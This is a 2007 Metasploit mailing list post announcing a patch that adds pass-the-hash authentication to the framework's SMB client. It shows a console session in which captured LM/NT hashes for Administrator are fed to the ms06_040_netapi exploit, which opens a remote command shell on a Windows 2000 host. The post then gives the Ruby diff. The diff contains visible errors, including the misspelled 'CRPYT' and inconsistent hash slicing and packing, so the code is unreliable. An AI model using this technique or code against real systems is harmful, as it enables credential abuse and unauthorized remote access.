Metasploit mailing list archives
Pass The Hash mod for smb/client.rb
From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Wed, 9 May 2007 02:11:55 -0500
MSF3 now supports "Pass The Hash" for those times you need to use authentication but you can't crack the hashes. Right now its just looking for a password length of 65 characters (lanman:ntlm) so if you have a 65 character password then we'll have to figure something else out. :) I've done some limited testing against Windows 2000. The only one that didn't work was HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\LMCompatibilitylevel set to 5 (LMv2, NTLMv2). It failed with the cleartext password too so I guess it hasn't been implemented yet. Example: msf exploit(ms06_040_netapi) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C msf exploit(ms06_040_netapi) > set SMBUser Administrator SMBUser => Administrator msf exploit(ms06_040_netapi) > exploit [*] Started bind handler [*] Doing pass the hash. [*] LM: 6A98EB0FB88A449CBE6FABFD825BCA61 [*] NT: A4141712F19E9DD5ADF16919BB38A95C [*] Detected a Windows 2000 target [*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0 at ncacn_np:192.168.110.130[\BROWSER] ... [*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0 at ncacn_np:192.168.110.130[\BROWSER] ... [*] Building the stub data... [*] Calling the vulnerable function... [*] Command shell session 1 opened (192.168.110.1:34583 -> 192.168.110.130:4444) Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> -- ..:[ grutz at jingojango dot net ]:.. GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4 "There's just no amusing way to say, 'I have a CISSP'." -------------- next part -------------- Index: lib/rex/proto/smb/client.rb =================================================================== --- lib/rex/proto/smb/client.rb (revision 4889) +++ lib/rex/proto/smb/client.rb (working copy) @@ -568,8 +568,13 @@ raise XCEPT::NTLM1MissingChallenge if not self.challenge_key - hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : '' - hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : '' + if (pass.length == 65) + hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack('H42'), self.challenge_key) + hash_nt = CRPYT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), self.challenge_key) + else + hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : '' + hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : '' + end data = '' data << hash_lm @@ -690,7 +695,11 @@ nonce = CRYPT.md5_hash(self.challenge_key + client_challenge) # Generate the NTLM hash - resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8]) + if (pass.length == 65) + resp_ntlm = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), nonce[0, 8]) + else + resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8]) + end # Generate the fake LANMAN hash resp_lmv2 = client_challenge + ("\x00" * 16) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 191 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070509/d47469f7/attachment.pgp>
Current thread:
- Pass The Hash mod for smb/client.rb Kurt Grutzmacher (May 09)
- Pass The Hash mod for smb/client.rb H D Moore (May 09)